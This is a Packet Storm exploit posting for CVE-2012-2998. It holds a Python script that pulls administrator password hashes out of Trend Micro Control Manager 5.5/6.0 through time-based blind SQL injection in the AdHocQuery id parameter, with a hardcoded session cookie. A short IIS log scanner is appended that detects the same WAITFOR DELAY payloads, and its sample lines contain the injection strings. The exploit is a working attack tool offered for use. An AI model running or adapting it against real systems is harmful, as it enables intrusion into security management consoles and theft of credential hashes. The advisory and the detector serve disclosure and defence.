Trend Micro Control Manager 5.5 / 6.0 Blind SQL Injection

Packet Storm ID: PACKETSTORM:116947
Date: 2012-09-27
Author: modpr0be
Source: packetstormsecurity.com


```python
#!/usr/bin/env python

# Exploit Title: Trend Micro Control Manager 5.5/6.0 AdHocQuery BlindSQL Injection (post-auth)
# Disclosure Date: 09/27/2012
# Author: otoy (@otoy_rood) & modpr0be (@modpr0be)
# Contact: research[at]spentera.com
# Platform: Windows
# Tested on: Windows 2003 Standard Edition
# Software Link: http://www.trendmicro.com/ftp/products/tmcm/CM6_Package.zip
# References: http://www.spentera.com/2012/09/trend-micro-control-manager-sql-injection-and-xss-vulnerability/
# CVE-ID: CVE-2012-2998

### Software Description
# Trend Micro Control Manager is a centralized security management for the enterprise.
# The web-based management console tracks security performance, reports malware events and
# policy violations, and automates routine tasks. New features include a customizable dashboard
# and at-a-glance access to threat statistics from the Trend Micro Smart Protection Network,
# Trend Micro's cloud-based security infrastructure.

### Vulnerability Details
# The vulnerability is in the AdHocQuery module, in the id parameter. Injecting a payload after the
# id parameter, say ' WAITFOR DELAY '0:0:5'--, makes the web application hang for 5 seconds,
# which indicates that the web application is vulnerable to time-based SQL injection.

# The script below is just a proof of concept; you must supply a valid session cookie. This vulnerability
# needs some attack vector to be exploited (it is post-authentication), but it is still a vulnerability.
# Remember to set the cookie first.

### Disclosure Timeline
# 07/23/2012 - Bug found
# 07/25/2012 - Reported to CERT/CC
# 07/26/2012 - Reported to JPCERT/CC
# 08/14/2012 - Vendor received the vulnerability
# 09/20/2012 - Vendor acknowledged the vulnerability
# 09/27/2012 - Public advisory released


import sys,time,urllib,urllib2

print """
#===============================================================#
| |
| ___| | |
| \___ \ __ \ _ \ __ \ __| _ \ __| _` | |
| | | | __/ | | | __/ | ( | |
| _____/ .__/ \___|_| _|\__|\___|_| \__,_| |
| _| |
| |
| Trend Micro Control Manager BlindSQLi Password Extractor |
| CVE-2012-2998 |
| by otoy & modpr0be (research[at]spentera.com) |
| |
#===============================================================#
"""
host = raw_input("[+] Target IP: ")
target = 'https://%s/webapp/AdHocQuery/AdHocQuery_Processor.aspx' %(host)
#SQLi delay, for remote target increase the delay time (default: 2 seconds)
delay=2

cookie = ("ASP_NET_SessionId=pazibiigfom13ijbaaqxxx55; .ASPXAUTH=582E40E7A78D452B18EF6719DE422CE121E3E7793E2FB661679753C1DCA50D9F7873CFF37BAF54AB3CCD84F5899D930A5D190F2C99552739F1C19FAF80F3EEE444951D0C9B7F6FD707E83BFC02ABD21D; WFINFOR=test")

def Hex2Des(item):
    # ASCII code of the hex digit for item (0..15), i.e. '0'..'9', 'a'..'f'
    return ord(hex(item).replace('0x',''))

def konek(m,n):
    #borrow from SQLmap :)
    query=("' IF(UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(Password AS NVARCHAR(4000)),CHAR(32))) FROM db_ControlManager.dbo.tb_UserInfo"
           " WHERE CONVERT(NVARCHAR(4000),Password)>CHAR(32)),%s,1)) > %s) WAITFOR DELAY '0:0:%s'--" %(m,n,delay))

    values = { 'Action': 'View',
               'id': '350b651c-15c5-45ca-8d64-33b20f3fc4d8'+query,
               'asc': 'true',
               'Sort': 7,
               'paging': 10 }

    url = "%s?%s" % (target, urllib.urlencode(values))
    req = urllib2.Request(url)
    req.add_header('Cookie', cookie)
    try:
        starttime=time.time()
        response = urllib2.urlopen(req)
        endtime = time.time()
        # whole seconds the request took; a value >= delay means the server waited
        return int(endtime-starttime)
    except:
        print '\n[-] Uh oh! Exploit fail..'
        sys.exit(0)

print "[+] Using Time-Based method with %ds delay."%int(delay)
print "[+] Starting to extract hash from the first user."
sys.stdout.write('[+] Here is the hash : ')
sys.stdout.flush()

starttime = time.time()
for m in range(1,33):
    for n in range(0,16):
        wkttunggu = konek(m,Hex2Des(n))
        if (wkttunggu < delay):
            sys.stdout.write(chr(Hex2Des(n)))
            sys.stdout.flush()
            break
endtime = time.time()
print "\n[+] Done! Hash extracted in %d seconds" %int(endtime-starttime)

```
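Defensive counterpart to the Vulnerability Details above, added here and not part of the original advisory (Python 3): it scans IIS W3C log lines for requests to AdHocQuery_Processor.aspx whose id parameter is not a bare GUID, flags the WAITFOR DELAY marker, and notes when the response time reached the injected delay. The W3C field order and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# A legitimate AdHocQuery id is a bare GUID; anything appended to it is tampering.
GUID_RE = re.compile(r'^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$', re.I)
# Marker of the MSSQL time-based payload described in the advisory.
WAITFOR_RE = re.compile(r'WAITFOR\s+DELAY', re.I)
VULN_PAGE = '/webapp/adhocquery/adhocquery_processor.aspx'
# W3C field order assumed for the constructed log lines below (hypothetical).
FIELDS = ('date', 'time', 'cs-uri-stem', 'cs-uri-query', 'sc-status', 'time-taken')

def parse_iis_line(line):
    """Split one W3C extended log line into a dict, or None if malformed."""
    parts = line.split()
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def check_adhocquery_request(rec, delay_ms=2000):
    """Return a list of findings for one request to the AdHocQuery page."""
    if rec['cs-uri-stem'].lower() != VULN_PAGE:
        return []
    findings = []
    # parse_qs decodes %27 and '+' the same way the application sees them
    for raw_id in parse_qs(rec['cs-uri-query'], keep_blank_values=True).get('id', []):
        if GUID_RE.match(raw_id):
            continue
        findings.append('id is not a bare GUID: %r' % raw_id)
        if WAITFOR_RE.search(raw_id):
            findings.append('WAITFOR DELAY in id (time-based blind SQLi)')
    # a slow reply to a tampered id means the injected condition held (one bit leaked)
    if findings and int(rec['time-taken']) >= delay_ms:
        findings.append('served in %s ms, at or above the %d ms delay' % (rec['time-taken'], delay_ms))
    return findings

def scan(log_text, delay_ms=2000):
    """Return (time, findings) for every log line that raises a finding."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_iis_line(line) if line and not line.startswith('#') else None
        findings = check_adhocquery_request(rec, delay_ms) if rec else []
        if findings:
            hits.append((rec['time'], findings))
    return hits

# Constructed sample: a normal view, then the advisory's payload shape with a false condition (quick) and a true one (delayed).
SAMPLE_LOG = """#Fields: date time cs-uri-stem cs-uri-query sc-status time-taken
2012-09-27 10:00:01 /webapp/AdHocQuery/AdHocQuery_Processor.aspx Action=View&id=350b651c-15c5-45ca-8d64-33b20f3fc4d8&asc=true&Sort=7&paging=10 200 140
2012-09-27 10:00:05 /webapp/AdHocQuery/AdHocQuery_Processor.aspx Action=View&id=350b651c-15c5-45ca-8d64-33b20f3fc4d8%27+IF(1%3D2)+WAITFOR+DELAY+%270:0:2%27--&asc=true&Sort=7&paging=10 200 130
2012-09-27 10:00:06 /webapp/AdHocQuery/AdHocQuery_Processor.aspx Action=View&id=350b651c-15c5-45ca-8d64-33b20f3fc4d8%27+IF(1%3D1)+WAITFOR+DELAY+%270:0:2%27--&asc=true&Sort=7&paging=10 200 2210
"""
```

Running `scan(SAMPLE_LOG)` flags the two tampered requests only, and the number of such hits against one GUID over a short window is itself the signal that a character-by-character extraction like the one above is in progress.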